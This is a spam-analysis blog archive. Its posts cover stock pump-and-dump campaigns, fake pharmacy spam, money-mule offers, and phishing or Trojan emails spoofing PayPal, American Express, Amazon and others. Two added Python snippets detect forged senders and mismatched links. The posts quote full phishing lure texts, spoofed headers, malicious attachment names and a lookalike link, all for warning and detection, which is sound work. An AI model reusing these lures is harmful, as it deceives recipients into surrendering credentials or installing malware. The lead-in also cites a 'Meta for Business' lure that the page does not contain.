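The checks a spam analyst would run on both lures quoted on this page, the "Meta for Business" ad-violation email and this Bluehost "Status Alert," as an added Python example (not the author's code): compare the From display name with the domain the mail really came from, compare each link's visible text with its href, and surface the junk visible in the Bluehost sample, the random HTML comment <!--bhuzxuwtbw--> and the made-up <special> tag, which spammers insert to break fingerprint-based filters. The raw message, its addresses and domains, and the brand-to-domain table are all constructed for the example.

```python
"""Triage an e-mail lure: sender display name vs. real domain, link text vs. href,
and filter-evasion junk in the HTML.

Example code added to this article, not the author's.  RAW_MESSAGE mimics the
Bluehost sample on this page; its addresses, domains and the BRAND_DOMAINS table
are constructed for the example.
"""
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

RAW_MESSAGE = b"""\
From: Bluehost <support@mail-notice.example>
To: victim@example.net
Subject: Status Alert: Code: 2502
Content-Type: text/html; charset="utf-8"

<html><body>
Dear Valued Bluehost Customer.<!--bhuzxuwtbw-->
<p>Your account contains more than 9191 directories and may pose a potential performance risk.</p>
<p>We <special>recommend that you create special</special> tmp directory. Or use the link below:</p>
<a href="http://my.bluehost.com.login-check.example/tmp.php?doit=abc">https://my.bluehost.com/tmp.php</a>
</body></html>
"""

# Assumption: the mail domains each brand really sends from.  Illustrative values;
# take the real ones from the brand's own documentation.
BRAND_DOMAINS = {"bluehost": {"bluehost.com"}, "meta": {"facebookmail.com"}, "facebook": {"facebookmail.com"}}
KNOWN_TAGS = {"html", "head", "body", "title", "meta", "style", "p", "a", "br", "div", "span", "table",
              "tr", "td", "th", "img", "b", "i", "u", "strong", "em", "font", "center", "ul", "ol", "li",
              "h1", "h2", "h3", "h4", "h5", "h6"}


def registrable_domain(host) -> str:
    """Last two labels of a host.  Approximation (no public-suffix list), fine for triage."""
    return ".".join((host or "").lower().strip(".").split(".")[-2:])


class HtmlAudit(HTMLParser):
    """Collect anchors (href, visible text), comments and non-standard tags."""
    def __init__(self):
        super().__init__()
        self.links, self.comments, self.unknown_tags = [], [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        if tag not in KNOWN_TAGS:
            self.unknown_tags.append(tag)
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

    def handle_comment(self, data):
        self.comments.append(data.strip())


def check_links(links):
    out = []
    for href, text in links:
        href_domain = registrable_domain(urlparse(href).hostname)
        looks_like_url = text.lower().startswith(("http://", "https://"))
        text_domain = registrable_domain(urlparse(text).hostname) if looks_like_url else ""
        out.append({"href": href, "text": text, "href_domain": href_domain, "text_domain": text_domain,
                    "mismatch": bool(text_domain) and text_domain != href_domain})
    return out


def analyse_message(raw: bytes) -> dict:
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    display, address = parseaddr(str(msg["From"]))
    sender_domain = registrable_domain(address.rpartition("@")[2])
    brand = next((b for b in BRAND_DOMAINS if b in display.lower()), None)
    brand_mismatch = brand is not None and sender_domain not in BRAND_DOMAINS[brand]
    part = msg.get_body(preferencelist=("html", "plain"))
    audit = HtmlAudit()
    audit.feed(part.get_content() if part else "")
    links = check_links(audit.links)
    reasons = []
    if brand_mismatch:
        reasons.append(f"display name '{display}' but mail really from {sender_domain}")
    reasons += [f"link shows {l['text_domain']} but goes to {l['href_domain']}" for l in links if l["mismatch"]]
    if audit.comments:      # random comments are 'hash busters' that defeat fingerprint filters
        reasons.append(f"hidden comments: {audit.comments}")
    if audit.unknown_tags:  # invented tags serve the same purpose
        reasons.append(f"non-standard tags: {audit.unknown_tags}")
    return {"sender": {"display": display, "address": address, "domain": sender_domain,
                       "brand_mismatch": brand_mismatch},
            "links": links, "comments": audit.comments, "unknown_tags": audit.unknown_tags,
            "reasons": reasons,
            "verdict": "phishing" if brand_mismatch or any(l["mismatch"] for l in links) else "inconclusive"}


if __name__ == "__main__":
    for reason in analyse_message(RAW_MESSAGE)["reasons"]:
        print("-", reason)
```

Two of the signals decide the verdict on their own: a brand name in the display name with a sending domain the brand does not own, and link text that names one domain while the href lands on another (here the real host hides "my.bluehost.com" as a subdomain label in front of the attacker's domain). The hidden comment and the invented tag are reported but weighted as supporting evidence, since sloppy newsletters produce those too.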


September 7, 2014

Pump & dump scam fails, so Spammers revert to weight loss spam

One week after the second pump and dump stock scam failed to take off in the same month, spammers have reverted to one of their long time standbys: weight loss and fake pharmacy spam.

Here's some background information to bring you all up to speed. During August, 2014, spammers who play the "Penny Stocks" game conspired and purchased huge amounts of shares in two little known companies, which I wrote about here and here, at extremely low prices per share. They then rented a "Botnet" that enslaves hundreds of thousands, to millions, of infected personal and business computers to blast out huge volumes of spam email messages promoting those stocks. If you are reading this, you are probably a recipient of penny stock email scams.

In essence, these people use fake news and outright lies to pump up excitement in the stocks they have purchased on the cheap. Using flamboyant terminology, stock spammers try to generate a sense of ground-floor urgency in their messages, promising huge returns on investment to the spam recipients. What most folks may not realize is that these messages are part of a "pump and dump" scam, where the only winners are the puppet masters pulling your strings. They set target prices and sell out once those targets are reached. This happens when enough people are fooled into throwing their money away by purchasing as much of the worthless stock as they can afford.

Once the scammers sell off their shares, at a profit thanks to the "scammees," the value per share drops through the floor, and fast. There is usually a flurry of activity as victims try to sell out to late comers before they lose everything. In a few days, it is over and the stock tanks.

When the pump and dump scams end, spammers turn to other usually profitable scams, like the current blast of weight loss herbs and illicit prescription drugs sold through Russian fake pharmacies.


August 30, 2014

IRMGF pump and dump scam replaces failed RNBI stock scam

It was only 6 days ago that I wrote a blog article declaring that the failed RNBI penny stock pump and dump scam had ended. As of Friday, August 29, it was replaced with a similar scam pumping the stock symbol: IRMGF.

Short and to the point, this new pump and dump scam is targeting the stock of a Toronto based company called Inspiration Mining Corp. A look at the long term charts reveals that the last time there was any real value for their stock was in 2011, when it reached a short term high of 45.5 cents per share. Since then it has been on a long slide down to the 3 cent range one year ago. It only recovered slightly, to the 6 cent range on August 25, 2014, the day on which the current pump and dump scam began!

Following the initial email spam blast, the price rose to a high of 11.3 cents. The email spam subjects made claims about big news. The body text spoke about billions of dollars worth of metals being discovered by the company. However, if one takes a minute to read the company news, there is absolutely nothing about any major, or minor, developments or discoveries. Rather, they posted this disclosure:

INSPIRATION MINING C (OTCMKTS:IRMGF) declared that the Corporation is not aware of any specific factors, other than information previously disclosed in its public filings, news releases or statements, which would result in the levels of trading activity and change in the share price recorded.

The emails you are receiving have senders spoofing trading houses and subjects like: "Critical news information read now", followed by body text claiming (complete with all manner of typos): "Since the company discovered 4billion worth of proven metal reserves it has become the target of Walstreet invesstors looking to cash in on the rush." There is nothing to back up this claim. It is total bullshit!

My junk folder has been receiving about 10 of these a day, and yours probably is too. Disregard any that make it through your junk filters. Delete on sight. Do not be fooled into buying this stock during a pump and dump scam campaign. You will be among the losers.

Stay safe, both online and offline. Have a happy Labor Day weekend.


August 24, 2014

RNBI pump and dump stock fraud returns from the dead

It has been two months since the last appearance of a fraud campaign pumping and dumping shares of the worthless company: Rainbow International (RNBI). On August 23, it returned from the dead in a new spam campaign (as also noted here).

While some spam traps may have received RNBI spam a week earlier than me, the scam is ongoing right now. Beginning Friday afternoon and continuing through this post, spam is once again spewing out from compromised, infected computers that are part of a spam botnet. I hope that this article may save some innocent potential victims from falling into this renewed stock fraud scheme.

Since I last wrote about the RNBI pump and dump scam, on June 23, 2014, the only thing that changed was that the value per share plummeted to almost zero. This happened because there was no news or development from the company and because the people who ran the last pump had dumped their shares for whatever they could sell them for. As always happens, the last ones in suffered the greatest losses. This is typical of all Ponzi schemes.


July 10, 2014

Watch out for fake Amazon Order Details email malware scam

For the past few days I have intercepted numerous email scam messages, with the subject: "Order Details" and claiming to be From: Amazon.com ([email protected]). All contain a zip file attachment with a Trojan downloader or installer.

Recipients are being targeted by malicious actors abroad who bought email lists that were harvested by professional spammers and by malware infections with email harvesting modules on people's computers. The emails do not come from Amazon.com in any way. Anything claiming to be from Amazon in these messages is totally spoofed to trick you into opening the attached file. Doing so infects your Windows computer with a dangerous Trojan virus, which is identified by about 35 different names, by different anti-virus companies, as reported on VirusTotal, at the time this article was composed.

So you can be on the lookout, here is a copy of the text used in these messages.

Subject: Order Details
From: "Amazon.com" <[email protected]>

The first line in the message body is in a light gray banner:

"National" (on left)     "AmazonLocal.com" (on right)

How are you,,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.com.

Order Details

Order R:121317 Placed on May 28, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon. Amazon.com

The alleged invoice in the attached (over 100kb) file is a concealed Trojan Horse malware installer/downloader. If you open the zip file, named "report_id.zip", and execute the enclosed file, your computer will be infected.

I have created a new spam filter to detect and block these scams spoofing Amazon.com orders, for MailWasher Pro users and added it to my published MailWasher Pro Filters. In the event you get a false positive detection and deletion from the Amazon filter, I suggest adding the exact email address used in their From field to your Friends list. I don't think you will find "delivers" to be one of the ones used by Amazon, but I've been known to be wrong before. ;-(


February 23, 2014

Phishing scam targeting NatWest, Royal Bank of Scotland customers

I intercepted an email phishing scam today, targeting The Royal Bank of Scotland customers. It uses the abbreviation NatWest, as the sender and in logos on the page. Nat West stands for National Westminster Bank.

Analysis

The sender (From) claims to be: "NatWest Credit Card"
The subject is: Dear (They insert your email address here) Credit Card Online Services
The body text begins with:

Notice

Dear (your email address)
Your access to NatWest Credit Card Online Services is locked out..

Because of that, our security team had to suspend your account.

Please use the link below to unlock.:

The link in the message I received was on a compromised website named: sullivankitchen.com. The fraudsters have created a new folder, or folders, on that website and are using a single index file under /administrator/mobile to forward victims to another file (start.php) on the same website, to the actual location of the phishing page.

The phishing page has logos and other images and links stolen from the NatWest Royal Bank Of Scotland website. They have obviously failed to apply hotlink protection to their images, some of which were embedded from https locations. Example: https://cardservices.natwest.com/RBSG_Consumer/images/NatWest_alert.png

NB: In the footer, at the bottom of the page, is an out-of-date copyright notice, as follows: © 2005-2009 National Westminster Bank plc. This should raise your antennas, as it is now 2014!


February 20, 2014

Brand new pump and dump scam hits email inboxes

I was wondering when they'd make a comeback. Well, they're here! I'm referring to the good old pump and dump penny stock scams, promoted by fraudsters, via spam email messages.

The last time I saw any of these email scams was briefly in December, 2013. Before that the last serious scam run for penny stocks petered out at the end of the summer, 2013. Each one of those pump and dump scams listed a 4 letter stock symbol with a very low valuation, along with grandiose subjects and body text proclaiming that it was about to explode, or was releasing huge news, etc. Recipients were urged to buy in quickly, in huge quantities, which drove the prices up. As soon as those artificial prices peaked, the fraudsters running the scam sold off all of their shares at a profit, leaving all of the later investors holding the bag.

After disappearing for a few months, the penny stock scam has just returned, today, February 20, 2014. This time around, the stock being pumped up is PRFC. The emails are all using the exact same language and template. All have the subject: Very important information. Please read, although this is likely to change by tomorrow. All are sent from botnetted computers. The goal is the same as before. Scammers have purchased huge blocks of super-cheap penny stocks for PRFC and are now using spam messages to pump them higher. If they succeed, it will be at the expense of the people who are fooled by their new newsletter and plain language format.

However, I did find some humor in this batch of scams. Every one of them so far has been signed at the bottom with this text: "Your favorite friend and only broker :)" But apparently, my favorite friend and only broker has multiple personality disorder and is confused as to who he or she is with any given email. Each email has a different name in the From field! So far, my "only broker" claims to be: Noemi Cooke, Markus Robertson, Jasmine Suarez, Arlene Adkins and Leandro Kinney!

I've said it before and will say it again: "A fool and his money soon will part!" Don't be a fool. Never buy anything spamvertised, especially penny stocks. The game is stacked against you by true con men and women. You will not beat them at their own game. Delete pump and dump messages on sight.

BTW: I have updated my MailWasher Pro spam filters to detect and delete these messages for you, if you are also a registered MailWasher Pro user.


Beware of emails containing a PayPal Phishing scam attachment

February 20, 2014

Today, I received a suspicious email claiming to come from PayPal, with the subject: "Account Notification" - notifying me that I had to verify my account information - because of a "planned system upgrade." As I suspected, it was a Phishing scam, not only meant to steal one's PayPal credentials, but also your identity.

Here are the most important identifying features of this email scam.

PayPal Phishing Scam Email Contents

Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000

From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):

PayPal Account System Upgrade Verification.

Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.

 This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.

 Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.

 We apologize for any inconvenience, and thank you for your time.

Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.

Copyright © 1999-2014 PayPal. All rights reserved.

My analysis follows.


January 29, 2014

New Phishing scam targeting American Express card holders

Email malware and phishing scams are nothing new and most will appear for a while, then disappear, then reappear some time later. So it is with a new scam targeting American Express card holders on January 29, 2014.

Earlier today, my spam protection program, MailWasher Pro, auto-deleted a message that was a phishing scam against American Express card holders. Here are the pertinent details to watch out for, lest you fall for this scam.

Subject: American Express Security Notification
From (spoofed): "American Express" <[email protected]>
Return-path: <[email protected]>
Date: Wed, 29 Jan 2014 17:23:53 +0000
Some normally hidden email headers:
Received: from [94.197.44.27] (port=53006 helo=94.197.44.27.threembb.co.uk)
Received: from 94.197.44.27 (account [email protected] HELO otpfh.ifxkmqeu.com)
X-Mailer: The Bat! (v3.51.10) Home

The message body in plain text reads as follows.

American Express Security Notification

Dear Customer,

As you may already know we ask our customers to update the contact details associated with American Express card account.

A recent review of your account determined that you need to confirm the information associated with your American Express account.

As the Primary Contact, you must verify your account activity before you can continue using your card, and upon verification, we will remove any restrictions placed on your account.

We encourage you to use the following link and confirm your account details as soon as possible:

https://www.americanexpress.com/[Links to h**p://dychovka.eu/dissents/index.html]

Note: Failure to update your account may result in account limitations or even account closure.

We appreciate your prompt attention to this important matter.

Thank you,

Amber Justice

Level III Security Officer

American Express

© 2014 American Express Company. All rights reserved.
AMEX Account Security

Note: (I deactivated the hostile link for your safety)

Here are some pertinent details about this scam.
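The normally hidden headers quoted in this post and in the PayPal post above give away a forgery through three relationships: the display name invokes a brand the From domain does not belong to, the Return-Path goes to a different domain, and the relay that handed the message in is not a host of the claimed sender. The following added example (my own code, not the author's MailWasher filters) checks those relationships and pulls the originating IP from the earliest Received line; the sample headers are constructed after the PayPal message, with placeholder hosts, addresses and TEST-NET IPs.

```python
"""Triage the hidden headers of a suspicious e-mail with the standard library.

Added example. BRAND_DOMAINS is an assumed allow-list that a defender
maintains; it is not part of any product described on this page.
"""
import email
import re
from email import policy
from email.utils import parseaddr

# Assumption: the domains each brand really sends mail from.
BRAND_DOMAINS = {
    "paypal": {"paypal.com"},
    "american express": {"americanexpress.com"},
}

IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")
RECEIVED_FROM_RE = re.compile(r"^from\s+(\S+)", re.IGNORECASE)


def _domain(header_value: str) -> str:
    """Lowercase domain part of an address header, or '' if none."""
    _, addr = parseaddr(str(header_value))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _same_org(host: str, domain: str) -> bool:
    """True when host is the domain itself or a sub-host of it."""
    host, domain = host.lower().strip("[]."), domain.lower()
    return bool(domain) and (host == domain or host.endswith("." + domain))


def triage_headers(raw_message: str) -> dict:
    """Return the From domain, the origin IP and a list of human-readable findings."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    display_name, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = _domain(from_addr)
    return_domain = _domain(msg.get("Return-Path", ""))
    received = [str(r) for r in (msg.get_all("Received") or [])]
    findings = []

    # 1. Display name drops a brand name the sending domain does not belong to.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in display_name.lower() and not any(_same_org(from_domain, d) for d in domains):
            findings.append(f"display name claims {brand!r} but From domain is {from_domain!r}")

    # 2. Bounces would go somewhere other than the claimed sender's domain.
    if return_domain and from_domain and not _same_org(return_domain, from_domain):
        findings.append(f"Return-Path domain {return_domain!r} differs from From domain {from_domain!r}")

    origin_ip = ""
    if received:
        # 3. Topmost Received line: the relay that delivered to our server.
        m = RECEIVED_FROM_RE.match(received[0].strip())
        if m and not _same_org(m.group(1), from_domain):
            findings.append(f"mail entered via {m.group(1)!r}, not a {from_domain!r} host")
        # Bottom-most Received line is the earliest hop: where the mail began.
        ip = IP_RE.search(received[-1])
        origin_ip = ip.group(1) if ip else ""

    return {"from_domain": from_domain, "origin_ip": origin_ip, "findings": findings}


# Constructed sample modelled on the PayPal scam headers quoted on this page.
# Hosts, addresses, the queue id and the IP (TEST-NET-3) are placeholders.
SAMPLE_RAW = """\
Received: from mail.sender-host.example ([203.0.113.7])
    by mx.receiver.example with ESMTP id PLACEHOLDER; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal <service@paypal-notify.example>
Return-Path: <bounce@sender-host.example>
Subject: Account Notification

PayPal Account System Upgrade Verification.
"""

# Constructed control message that should produce no findings.
LEGIT_RAW = """\
Received: from mx1.paypal.com ([198.51.100.4])
    by mx.receiver.example with ESMTP id PLACEHOLDER2; Thu, 20 Feb 2014 17:30:00 +0000
From: PayPal <service@paypal.com>
Return-Path: <bounce@paypal.com>
Subject: Your receipt

constructed body
"""

if __name__ == "__main__":
    report = triage_headers(SAMPLE_RAW)
    print("origin IP:", report["origin_ip"])
    for f in report["findings"]:
        print(" -", f)
```

The origin IP is what you would then look up in a geolocation or blocklist service, as the funeral notice post below does by hand.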


January 21, 2014

Beware of an email scam spoofing faxes from Ring Central

Today's article is about a long established email scam that claims to deliver a fax or faxes inside an attached file. Last year, the majority of these scams pretended to come from eFax, which is a well established fax to email provider. However, the current batch are now spoofing RingCentral as the sender.

The emails that are spoofing RingCentral all have a similar construction to this recent spam message:

From: "Ralph Brock" <[email protected]>
Subject: New Fax Message on 01/15/2013

Body (plain) text:

You Have a New Fax Message
From: (607) 009-4357
Received: Wednesday, January 15, 2014 at 11:34 AM
Pages: 4
To view this message, please open the attachment.
Thank you for using RingCentral.

In this case the attached file was simply named "fax.zip" which contained a .exe Trojan installer.

Messages like this are mostly targeting businesses, many of whom do business using fax exchanges. The goal in these instances is to install information stealing malware onto networked computers. The opportunity for cyber thieves is tremendous if they can get a key person to open such a file and allow it to be installed onto her or his office computer. Company secrets as well as bank accounts are stolen this way every day.


January 13, 2014

Beware of funeral notice email scam leading to malware

Today I received an unusual email sent to one of my most rarely used accounts. In what turned out to be a malicious scam, the subject was: "Passing of your friend." That subject is certainly written to get your attention! The following was in the body text.

The Amos Family

Funeral Announcement
Hereby we want to share your sorrow for your dear friend who passed away on Friday, January 10, 2014.
You are cordially invited to express your sympathy in memory of your friend at a celebration of life service that will be held on Monday, January 13, 2014 at the Ocker Funeral Home, Arkansas.

Please find more detailed information about the memorial service here.

Sincerely,
Funeral Home Secretary,
Mateo
Little


The word "here" contains a link to a website in the Netherlands (youtubeforum.nl). The destination URL, which you can read on a PC by hovering over the link without clicking any buttons, is buried two folders under the root, in an aliased location named "/Funeral." Landing on that URL initiates the download of a file named: "FuneralProcession.zip" - which if opened contains a malicious file named: "FuneralProcession.exe."

Anybody who is tricked into downloading that zip file and opening its executable will have a Trojan installed on their PC. I guess I am the first to report this, as zero of 51 security scanners have looked at this file as of this posting. You can check the results on VirusTotal as the file gets analyzed, here.

In the meantime, if you receive an email like this one, know that it is a scam and delete it. Check the sender field to see if it corresponds to the name of the family or funeral home. In the case of the scam I received, the sender was listed as: "The Amos Family" <[email protected]>. Domains ending in .by are in Belarus, which is located in Eastern Europe, in the former Soviet Union. BY domains are registered to residents or citizens of that country. This email claimed to come from people having a funeral in Arkansas, which is thousands of miles away, on another continent.

The Amos Family name and email account is a forgery. When I traced the location of the sending computer (shown in the normally hidden headers), it too was located in Belarus, at 178.124.156.68, which is in Minsk, BY.

So, even without an anti virus program scanning your email, one can see that the sender's email domain and the link URL have no correlation to the funeral notice location.

Stay safe this Winter. Scammers have been ramping up their efforts to infect as many PCs as possible with Trojan downloaders, which in turn download and install bank account stealing malware and other nasties. They will keep changing the subject lines to attract attention and trick you into clicking before thinking. No matter what version of Windows you are using, make sure it is equipped with up-to-date anti-virus and anti-malware programs, just in case you are tricked into clicking on a malicious link.


October 28, 2013

Watch out for work at home email scams

October 27, 2013

It's Monday morning and a quick check of my MailWasher Pro recycle bin revealed a slew of work at home scams, with links to websites having .EU extensions. EU represents European domain names. Domain names I have seen are variations of IWillTeachYouToBeRich{3 or 4 characters}.eu/

Many of these domains have already been suspended due to reports from SpamCop, and other spam reporting agencies. The one that is still active at this moment (hosted in China at 111.121.193.200) contains a typical work at home scam promotion, using tons of JavaScript to display a message containing your approximate location. This is known as Geo-targeting. If you live in Chicago, the scam message will say that so and so, a work at home mom, made $8,000 in one month using this program. The copy mentions that you will be working with companies worth over 100 billion dollars.

The landing page is booby trapped with popup windows to try to prevent you from leaving the site, unless you agree to sign up, or completely close your browser. The payload is a link to purchase "Home Income Kit." This is a money mule scam run by professional con men. People who buy these useless info packs are then solicited to become "mules" in a money laundering or stolen goods reshipper racket.

Sidenote: I write custom spam filters for MailWasher Pro. My filters detect and auto-delete such scams and many others.

Note, all of these work at home websites are blocked by Trend Micro Internet Security programs, which I use and recommend. Even if you knowingly try to visit these pages, Trend's browser protection module blocks them with this unmistakeable notice: "Trend Micro has confirmed that this website can transmit malicious software or has been involved in online scams or fraud."


August 18, 2013

Weight loss spam returns to overtake new pump and dump scams

Last week, I wrote two articles (1 - 2) that revealed that the amount of spam for green coffee bean extract had been surpassed by a big pump and dump campaign, which was pushing two different stocks. Now, the pattern has reversed and weight loss spam exceeds pump and dump.

Regarding the weight loss scams; they no longer mention green coffee bean extract in the spam message bodies. You find this out if you click on the links, which have also morphed from Polish domains (.pl) to Russian domains (.ru). The rest is the same stuff, using Russian underground affiliate template web pages, hosted on Russian web domains. Most of the diet scams I saw this week are spoofing Dr. Oz as the sender, using a couple of different spellings. The message bodies even claim to be official Dr. Oz newsletters, which they are NOT! All of the details are bogus, as is the diet formula they promote.

Note: I researched Green Coffee Bean Extract and found reports on real forums (like WebMD) where most of the people using it got sick from it, until they stopped taking those capsules. The only weight loss was from vomiting, etc.

Pump and Dump

The new pump and dump scam emerging over the last few days is a scam promoting a stock with the symbol MONK. The two previous campaigns seem to be mostly abandoned, after they failed to make the expected profits for the scammers running this dog and pony show. If you are smart, when you see emails promoting MONK, with or without underscores and/or spaces between the capitalized letters, don't be fooled into thinking they are legit. They are scams, run by professional con men, all of whom have conspired to purchase large volumes of shares in the penny stocks they pump up.

As always, the goal of a pump and dump campaign is to pump up interest in a stock, using botnet sent spam messages, driving up the volume of transactions and the value per share. When the value reaches an agreed-upon price, the scammers all sell off their shares, turning a profit for themselves, at the expense of everybody else whom they suckered in.

Today's take-away

1: Green coffee beans won't help you lose weight, but will sicken you and lighten your wallet.
2: Getting involved with a pump and dump stock scam will lighten your bank account when it fails. Further, these are Ponzi Scams, under US law.


August 11, 2013

It's time for a reality check regarding IMTC pump and dump stock campaign

Last week I wrote about a new "pump and dump" spam campaign being used to artificially inflate the value of a penny stock, with the trading symbol IMTC (actually renamed to IMTCQB). Spam for this penny stock has exploded over the last week, overtaking all other categories.

The pump and dump email messages are sent by anonymous persons, using spoofed sender information and compromised computers, making grandiose claims about the potential profits for investors. Despite not revealing their actual names, the scammers often use the first person in the subjects or body text, with phrases like "If this company doesn`t Bounce I will RETIRE!"

The purpose of these anonymous email spam messages is to pump up the value of a low value stock by means of trickery, until it peaks. The people behind these stock spam campaigns purchase large volumes of a targeted stock when the price is very, very low. At an agreed upon time they compose an email spam campaign and rent a botnet to disburse fake news and innuendo about the potential trading value of that stock.

Eventually, after enough people have been fooled into investing in this risky endeavor, the value per share goes up, often substantially, in a short time. Then, when the value appears to have peaked, or reaches an agreed upon value, the scammers sell off (dump) all of their holdings at a profit, leaving the later investors holding the empty bag. Thus, it is no surprise that on the Otcmarkets.com page for IMTC, a black skull and crossbones is displayed, with the Caveat Emptor hover text beginning with: buyer beware.

The latest incarnation of these spam messages goes to great length to try to fool potential investors with long paragraphs written in broken English (by scammers whose native language is not English). They are now even including a paragraph of disclaimer language, again using poor English grammar. This should act as a red flag for any North American English reading potential investors (who are the primary targets of this campaign)!

The following is a direct quote, bad grammar included, from one of this weekend's email scams promoting the IMTC stock.


June 30, 2013

Email spam, scam and threat round-up for week ending on June 30, 2013

The overall volume of spam over this past week is greatly reduced, to say the least. Not only have the types of spam subjects become fewer, but the number of malware threats has dropped as well.

The few malware threats that arrived in my MailWasher Pro Inbox were in the form of attached zip files pretending to contain Better Business Bureau complaints (Subject: FW: Complaint Case 2UBG8353D9XLI0Z) or an ADP Payroll invoice (Subject: ADP Payroll INVOICE for week ending 06/21/2013).

Malicious files in email attachments are best managed by an up-to-date anti-virus program that can monitor incoming email messages, as well as files you open before running, such as zip and pdf files. I personally use and recommend Trend Micro Internet Security products. They use "in the cloud" malware definitions for the newest threats, so they don't bog your computer down with what would otherwise be a huge virus database on your hard drive (and loaded in RAM memory).

Also, if you operate your computer with less than Administrator privileges, and keep your bullshit detectors on high, you will be about 90% less likely to get infected by most malware, especially the silent install type. The B.S. detectors are for when an installer pops up a UAC prompt asking for the Administrator password to continue.


June 12, 2013

Beware of email job offers from Money Mule recruiters

I have written about spam issues for many years now, covering junk email selling illicit prescription drugs, bogus weight loss substances, E.D. pills, counterfeit watches, purses and shoes, malware link/attachment threats, as well as financial scams like Nigerian advance fee/overpayment (419), pump and dump penny stocks, work at home ripoffs and fake job offers. Today's article is about the last item.

Some types of spam are always present, like the illicit E.D. pills and Nigerian 419 scams. Every now and then something new comes along and gets spammed out heavily for a while, like the current green coffee weight loss scam. But, these new items tend to disappear when the spammers renting the use of botnets lose money promoting things that their recipients aren't interested in trying. That is why we see different spam topics every few weeks.

Most spam, from the 1978 ARPANET DEC email blast to present, has been to take some of your money for some item or substance. 419 scams get you to pay advance fee money in the false expectation of receiving a fortune in return.

Malware delivered by email is usually meant to steal money from online banking users, or valuable website login credentials (Phishing scams), bank card numbers, and even your identity. Or, it might demand a payment to restore the use of your "locked" computer, or to fix non-existent system problems it claims to have found. This malware is either delivered via an email attachment, or by hyperlinks to a hostile website that exploits vulnerable software that may be installed on your computer or smart device.

Fake employment offers, on the other hand, are meant to get YOU to participate in stealing other people's money, as the middle-man who receives, then remits stolen funds to cybercriminals pretending to be employers. The people who enter into these schemes are known as Money Mules.

Read on to find out how this scam works and what the consequences could be for those who get involved.


June 9, 2013

E-mail spam and scam roundup for June 3 - 9, 2013.

Since the recent forced shutdown and seizure of Liberty Reserve, a major payment portal used by cybercriminals (and also, unfortunately, many innocent people), spammers and scammers have been experiencing trouble getting paid their ill-gotten money. Nonetheless, certain types of spam continue to flood our inboxes, as shown in this article.

My stats are derived from MailWasher Pro, which is a desktop POP3 and IMAP spam filter that goes between your email server and your email client. The classifications of spam come from spam filters I write and publish for use by other MailWasher Pro users.

SPAM

This week the majority of spam was for counterfeit or useless drugs, most with domain names that begin with "greecoffeeultra." These domains are often registered on the day you begin seeing spam claiming you only have 24 or 48 hours to act, or some similar garbage subject. I did some research into a few of these domains and learned that the ones arriving today were just registered a few hours earlier and are set to expire in just two weeks. The "Registrar" is listed as Domain Silver Inc., in the Seychelles. It is very unusual to allow such a short registration period and it is no surprise that spammers are attracted to this company.

The From addresses are composed of two parts. The first shows a name, like iWellHealth, GreatHealth, or something similar. The second part is the email address, which is totally bogus. These are composed of about 10 or 12 characters of random upper and lower case letters, followed by three digits, then some imaginary or real domain name. I have updated my MailWasher filter "Known Spam [From]" to detect and auto-delete these messages so you don't have to deal with them.

Most of these "greencoffee" domains end in the extension .pl - which stands for Poland. The websites are hosted in the Ukraine and did not return any results when I checked them. But, they are active websites and may be populated with illicit content at any time.

Other drug spam is for Russian domains (.ru), which are only supposed to be registered to Russian citizens. The websites at the end of the links were mostly hosted in ...The Ukraine. They have a big spam hosting problem there.

Continue reading "E-mail spam and scam roundup for June 3 - 9, 2013." »

May 26, 2013

Spam and email threat roundup for May 19 - 26, 2013

This past week has seen the return of Russian fake pharmacy spam, including the long-dead "Canadian Pharmacy" name. There was a short lull in this type of spam while other categories of junk email were being deployed; mostly pump and dump stock scams.

Russian pharmacy spam (and all other types) is sent from zombie computers that have become infected and involuntarily made part of spam "botnets." The bot-masters who own these botnets rent them out to spammers who are affiliates for various underworld networks that promote all manner of counterfeit goods (watches, handbags, shoes), illicit prescription drugs, Chinese weight-loss herbs, Russian, Ukrainian and Asian "dating" networks, money mule recruitment (e.g. work at home scams), Nigerian 419 scams, pump and dump stock scams, and malware in attachments or in the destination websites of hostile hyperlinks.

The Russian pharmacies are all template websites run by affiliate spammers, hosted on Russian domains, which end in the extension .ru. There are also some Ukrainian hosted fake pharmacies and dating scam websites hosted on domains ending in .com.ua. If you are able to read the actual destination of a link before you click on it, by hovering, or in plain text, if it ends in .ru, it is hosted on a Russian server, or on an account registered to a Russian citizen. I hope that my readers will not want to subsidize Russian cybercriminals who sell counterfeit drugs or other illicit goods on Russian websites.

Also making a comeback this weekend is an emerging (returning, I believe) pump and dump stock scam revolving around a sub-penny stock with the symbol: BYSD. This stock appears to have been pump and dumped at least once before and is being pumped again, today. Beware of spam messages making outrageous claims about the Bayside Corp stock. It is going nowhere anytime soon, and the only news they have released is to announce a new CEO. Some group has bought up a huge block of their junk stock at .006, or so, and is trying to sucker unsavvy investors into buying thousands of shares at a penny, plus, driving up the price, until the scammers dump all their shares and leave the rest of the investors holding an empty bag.

